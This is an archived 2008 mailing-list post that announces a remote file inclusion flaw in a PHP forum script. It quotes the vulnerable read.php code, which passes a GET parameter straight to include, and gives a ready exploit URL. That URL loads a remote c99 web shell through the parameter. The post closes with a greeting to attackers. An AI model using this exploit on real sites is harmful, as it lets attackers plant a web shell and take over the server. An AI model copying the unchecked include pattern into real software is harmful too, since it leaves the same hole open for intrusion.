OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
remote file include

win32.exew.cn
Date: Tue Apr 15 2008 - 14:13:42 CDT


#########################################################################
        Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################

## AUTHOR: THuGM4N
## Email : Win32.exew.cn

## Script : Istant-Replay Forum

## Site : http://www.chattaitaliano.com

## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## BUT THE EXPLOIT IS LIKE THAT :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?
 

## BIGUP 2 All Attackers Around The World .

#########################################################################
      Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################